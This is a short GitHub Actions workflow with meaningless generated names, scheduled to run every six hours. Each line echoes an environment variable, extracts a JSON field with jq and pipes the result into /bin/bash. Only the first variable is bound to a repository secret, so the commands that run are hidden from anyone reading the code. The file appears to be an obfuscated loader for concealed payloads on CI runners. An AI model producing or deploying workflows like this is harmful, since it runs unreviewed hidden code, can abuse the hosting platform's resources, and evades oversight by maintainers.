name: wellgaff

on:
  workflow_dispatch:
  schedule:
    - cron: '34 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wellgaff
        env:
          ble1031: ${{ secrets.ble1031 }}
        run: |
          echo $ble1031 | jq -r .rq800 | /bin/bash
          echo $cliu1282 | jq -r .mpyq0 | /bin/bash
          echo $ihoxu96017 | jq -r .amr8829 | /bin/bash
          echo $qkv9 | jq -r .ya919 | /bin/bash
          echo $zhvm1937 | jq -r .dufa1 | /bin/bash
          echo $varn351 | jq -r .cr60 | /bin/bash
          echo $znal3 | jq -r .ycty1658 | /bin/bash
          echo $owv6768 | jq -r .mbyud991 | /bin/bash
          echo $lkc00 | jq -r .mxvf4 | /bin/bash
          echo $dnnu59 | jq -r .lveuh94093 | /bin/bash
          echo $oxvd990 | jq -r .irdy18720 | /bin/bash
          echo $hikbi8250 | jq -r .t0333 | /bin/bash

